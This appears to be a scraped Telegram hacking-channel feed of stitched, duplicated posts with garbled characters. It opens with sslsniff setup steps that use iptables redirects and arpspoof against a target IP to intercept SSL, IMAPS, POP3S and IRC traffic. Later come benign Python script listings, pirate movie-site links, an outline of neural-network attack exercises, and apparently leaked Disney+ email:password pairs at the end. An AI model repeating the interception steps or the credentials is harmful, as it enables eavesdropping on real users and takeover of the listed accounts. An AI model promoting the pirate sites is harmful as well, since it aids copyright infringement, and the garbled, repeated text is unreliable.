2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports <$listenPort>)
3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports <$httpListenPort>)
4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)
5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)
6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)
๐ฆSetting up pf
-------------
1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.
๐ฆ Running arpspoof
--------------------------
1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.
2) * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1
At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.
โ VERIFIED BY UNDERCODE
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019-2020 so helpfull scripts termux-linux :
t.me/UndercodeTesting
Make sure you've already git installed. Then you can run the following commands to get the scripts on your computer:
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
OS X, Linux and Windows,termux
1) git clone https://github.com/Logan1x/Python-Scripts.git
2) cd Python-Scripts/bin
๐ฆAir Quality Script
This script renders the air quality from the location of the user
The location is fetched using the user's IP address
This script requires a key from WAQI.
It is free and can be fetched from http://aqicn.org/data-platform/token/#/
Usage Instructions
python air-quality.py token
๐ฆApproximating pi
This script is useful to show a way to approximate the value of pi using a Monte Carlo method. It is also optimized using the @jit (just-in-time) decorator from the numba library.
๐ฆBlog Reader
Blog Reader is the terminal reader that scrapes the article from planet dgplug and displays it on the terminal.
It separates the content accrding to the screen size.
python Blog_reader.py
Bulk add users to Twitter list
Simple script helps you mass add users to your twitter list to follow (Ex: Bitcoin/Altcoins official account, news, traders...)
๐ฆPrepare list screen names
Setup your app and get an access token
pip install twitter
python bulk_add_twitter_list.py
๐ฆCaesar Cipher
Encrypts or Decrypts any message you want, simply enter the message and the rotation number
python caesar_cipher.py
๐ฆcontributors list :
python .\contributors.py https://github.com/Logan1x/Python-Scripts/
where the argument is the url of the repo
you may need to install packages like PIL@1.1.7 and requests if not installed
๐ฆEnd To End Encryption
It is a simple program to implement and understand the basic of end_to_end encryption. Here I am using caesar cipher to encrypt but in reality they use algotihms lile SHA-1, RSA etc.
python end_to_end.py
๐ฆExpense Manager
Simple GUI program which helps you calculate your expenses, monitor them just through mouse clicks. All you have to do is run the script and choose an option from the menu which will displayed when you run the script. Enter Your Expenses as eg: "Biscuits Rs 15" " rs " ignore the quotes.
python expense_manger.py
๐ฆFacebook Auto Post
This is python script that log in into facebook and post the status.
You can see live execution of this script here.
pip install -r facebook-auto-post.requirements.txt
python facebook-auto-post.py
Find Large Files
Searches a file location and subdirectories for files larger than a given size. Useful for phones which might hide files in FileExplorer, but allow use as flash memory. Directly prints results if run directly. May also be imported, yielding results one by one.
๐ฆFTP Download File
A simple application to download a file via FTP with the given remote and local path Parameters:
-hh hostname
-u username
-p password
-rd remote directory
-ld local directory
python ftp_download_file.py
๐ฆFetch HTML
This script fetch html response from the provided url and parse xml tag to get only text content and print out.
python fetch_html.py https://github.com
๐ฆGet External IP
Gets the external IP-Address from the current machine and prints it to the console
python getExternalIp.py
Group files by type
Group files by their extensions
Files are moved into folders with extension names
Usage Instructions
python group_file_by_type.py 'C:\\test\\products'
๐ฆHandy offline dictionary
A tiny offline dictionary app based on nltk wordnet and pyqt5
cd dictionary
python app.py
โ + much more on their readme file
e n j o y
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019-2020 so helpfull scripts termux-linux :
t.me/UndercodeTesting
Make sure you've already git installed. Then you can run the following commands to get the scripts on your computer:
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
OS X, Linux and Windows,termux
1) git clone https://github.com/Logan1x/Python-Scripts.git
2) cd Python-Scripts/bin
๐ฆAir Quality Script
This script renders the air quality from the location of the user
The location is fetched using the user's IP address
This script requires a key from WAQI.
It is free and can be fetched from http://aqicn.org/data-platform/token/#/
Usage Instructions
python air-quality.py token
๐ฆApproximating pi
This script is useful to show a way to approximate the value of pi using a Monte Carlo method. It is also optimized using the @jit (just-in-time) decorator from the numba library.
๐ฆBlog Reader
Blog Reader is the terminal reader that scrapes the article from planet dgplug and displays it on the terminal.
It separates the content accrding to the screen size.
python Blog_reader.py
Bulk add users to Twitter list
Simple script helps you mass add users to your twitter list to follow (Ex: Bitcoin/Altcoins official account, news, traders...)
๐ฆPrepare list screen names
Setup your app and get an access token
pip install twitter
python bulk_add_twitter_list.py
๐ฆCaesar Cipher
Encrypts or Decrypts any message you want, simply enter the message and the rotation number
python caesar_cipher.py
๐ฆcontributors list :
python .\contributors.py https://github.com/Logan1x/Python-Scripts/
where the argument is the url of the repo
you may need to install packages like PIL@1.1.7 and requests if not installed
๐ฆEnd To End Encryption
It is a simple program to implement and understand the basic of end_to_end encryption. Here I am using caesar cipher to encrypt but in reality they use algotihms lile SHA-1, RSA etc.
python end_to_end.py
๐ฆExpense Manager
Simple GUI program which helps you calculate your expenses, monitor them just through mouse clicks. All you have to do is run the script and choose an option from the menu which will displayed when you run the script. Enter Your Expenses as eg: "Biscuits Rs 15" " rs " ignore the quotes.
python expense_manger.py
๐ฆFacebook Auto Post
This is python script that log in into facebook and post the status.
You can see live execution of this script here.
pip install -r facebook-auto-post.requirements.txt
python facebook-auto-post.py
Find Large Files
Searches a file location and subdirectories for files larger than a given size. Useful for phones which might hide files in FileExplorer, but allow use as flash memory. Directly prints results if run directly. May also be imported, yielding results one by one.
๐ฆFTP Download File
A simple application to download a file via FTP with the given remote and local path Parameters:
-hh hostname
-u username
-p password
-rd remote directory
-ld local directory
python ftp_download_file.py
๐ฆFetch HTML
This script fetch html response from the provided url and parse xml tag to get only text content and print out.
python fetch_html.py https://github.com
๐ฆGet External IP
Gets the external IP-Address from the current machine and prints it to the console
python getExternalIp.py
Group files by type
Group files by their extensions
Files are moved into folders with extension names
Usage Instructions
python group_file_by_type.py 'C:\\test\\products'
๐ฆHandy offline dictionary
A tiny offline dictionary app based on nltk wordnet and pyqt5
cd dictionary
python app.py
โ + much more on their readme file
e n j o y
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 movies steam sites :
https://www1.solarmovies.co/
https://tubitv.com/
http://123moviesgo.ga/
http://gostream.site/
https://www.imdb.com/tv/
http://streamm4u.com/
https://www.vudu.com/
https://scr.cr/
https://spacemov.top/
https://www.crackle.com/
https://yesmovies.to/
http://oakmovies.com/
https://filmrise.com/
https://xmovies8.pl/
https://www.popcornflix.com/pages/discover/d/movies
http://www.streamlord.com/
https://www.kanopy.com/
https://www.yidio.com/
https://archive.org/
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 movies steam sites :
https://www1.solarmovies.co/
https://tubitv.com/
http://123moviesgo.ga/
http://gostream.site/
https://www.imdb.com/tv/
http://streamm4u.com/
https://www.vudu.com/
https://scr.cr/
https://spacemov.top/
https://www.crackle.com/
https://yesmovies.to/
http://oakmovies.com/
https://filmrise.com/
https://xmovies8.pl/
https://www.popcornflix.com/pages/discover/d/movies
http://www.streamlord.com/
https://www.kanopy.com/
https://www.yidio.com/
https://archive.org/
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
SolarMovies
Watch FREE Movies Online & TV shows - SolarMovies
Watch Movies Online and Watch Tv-Series online On SolarMovies without Registration.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 Hacking Neural Networks :
youtube.com/undercode
> an offensive manner (bug hunting, shellcode obfuscation, etc.) and how to exploit neural networks found in the wild (information extraction, malware injection, backdooring, etc.)
๐ฆThe exercises :
0 - Last Layer Attack
1 - Backdooring
2 - Extracting Information
3 - Brute Forcing
4 - Neural Overflow
5 - Malware Injection
6 - Neural Obfuscation
7 - Bug Hunting
8 - GPU Attack
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) Keras: Installing Keras can be tricky. We refer to the official installation guide at https://keras.io/#installation and suggest TensorFlow as a backend (using the GPU-enabled version, if one is available on the machine).
2) NumPy, SciPy and scikit-image: NumPy and SciPy are excellent helper packages, which are used throughout all exercises. Following the official SciPy instructions should also install NumPy https://www.scipy.org/install.html. We will also need to install scikit-image for image loading and saving: https://scikit-image.org/docs/stable/install.html.
3) PyCuda: PyCuda is required for the GPU-based attack exercise. If no nVidia GPU is available on the machine, this can be skipped. https://wiki.tiker.net/PyCuda/Installation
4) NLTK: NLTK provides functionalities for natural language processing and is very helpful for some of the exercises. https://www.nltk.org/install.html
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 Hacking Neural Networks :
youtube.com/undercode
> an offensive manner (bug hunting, shellcode obfuscation, etc.) and how to exploit neural networks found in the wild (information extraction, malware injection, backdooring, etc.)
๐ฆThe exercises :
0 - Last Layer Attack
1 - Backdooring
2 - Extracting Information
3 - Brute Forcing
4 - Neural Overflow
5 - Malware Injection
6 - Neural Obfuscation
7 - Bug Hunting
8 - GPU Attack
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) Keras: Installing Keras can be tricky. We refer to the official installation guide at https://keras.io/#installation and suggest TensorFlow as a backend (using the GPU-enabled version, if one is available on the machine).
2) NumPy, SciPy and scikit-image: NumPy and SciPy are excellent helper packages, which are used throughout all exercises. Following the official SciPy instructions should also install NumPy https://www.scipy.org/install.html. We will also need to install scikit-image for image loading and saving: https://scikit-image.org/docs/stable/install.html.
3) PyCuda: PyCuda is required for the GPU-based attack exercise. If no nVidia GPU is available on the machine, this can be skipped. https://wiki.tiker.net/PyCuda/Installation
4) NLTK: NLTK provides functionalities for natural language processing and is very helpful for some of the exercises. https://www.nltk.org/install.html
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
YouTube
UNDERCODE
FREE AI & CYBERSECURITY TRICKS & MALWARE ANALYSIS HACKS, DAILY MEMES & MINDโBENDING TECH MYSTERIESโฆ ALL ON UNDERCODE!
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 โ https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsโฆ
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 โ https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsโฆ
๐ฆ DISNEY + โ
jarrettbuilding@gmail.com:Anom4u8!
saniul@hotmail.com:slAynet1230
jarrettbuilding@gmail.com:Anom4u8!
saniul@hotmail.com:slAynet1230